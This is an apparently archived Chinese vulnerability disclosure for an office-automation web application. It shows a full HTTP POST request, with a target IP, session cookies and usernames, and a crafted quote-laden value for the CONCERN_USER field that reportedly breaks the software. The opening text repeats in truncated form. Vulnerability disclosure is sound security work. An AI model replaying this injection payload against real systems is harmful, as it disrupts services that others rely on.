VULHUB ™

### 简要描述： 瘫痪软件 ### 详细说明： [<img src="https://images.seebug.org/upload/201412/151101097b7c298c97ea1cb6cf7e4af89c3b0cf6.jpg" alt="QQ图片20141215110029.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/151101097b7c298c97ea1cb6cf7e4af89c3b0cf6.jpg) 添加关注的人，众多功能依赖该数据 ``` POST http://121.40.134.14/general/person_info/concern_user/update.php HTTP/1.1 Host: 121.40.134.14 Connection: keep-alive Content-Length: 70 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://121.40.134.14 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://121.40.134.14/general/person_info/concern_user/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: UserSelectRole=0; PHPSESSID=3242388d3217ca04d2440224594bd5db; USER_NAME_COOKIE=wangde; OA_USER_ID=wangde;...

### 简要描述： 瘫痪软件 ### 详细说明： [<img src="https://images.seebug.org/upload/201412/151101097b7c298c97ea1cb6cf7e4af89c3b0cf6.jpg" alt="QQ图片20141215110029.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/151101097b7c298c97ea1cb6cf7e4af89c3b0cf6.jpg) 添加关注的人，众多功能依赖该数据 ``` POST http://121.40.134.14/general/person_info/concern_user/update.php HTTP/1.1 Host: 121.40.134.14 Connection: keep-alive Content-Length: 70 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://121.40.134.14 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://121.40.134.14/general/person_info/concern_user/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: UserSelectRole=0; PHPSESSID=3242388d3217ca04d2440224594bd5db; USER_NAME_COOKIE=wangde; OA_USER_ID=wangde; SID_5=f48e5e5e; hideTopbar=1 CONCERN_USER=user%28%29chenqiang%2C&CONCERN_USER_NAME=%CB%D5%C3%F72%2C ``` 提交 ``` CONCERN_USER=user%28%29chenqiang%2C'%27wang'de%2C&CONCERN_USER_NAME=%CD%F5%B5%C2'%2C' ``` 导致 [<img src="https://images.seebug.org/upload/201412/15111045f44650f12860bb52eefb9f76cc146622.png" alt="QQ截图20141215111005.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/15111045f44650f12860bb52eefb9f76cc146622.png) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201412/15111045f44650f12860bb52eefb9f76cc146622.png" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/15111045f44650f12860bb52eefb9f76cc146622.png)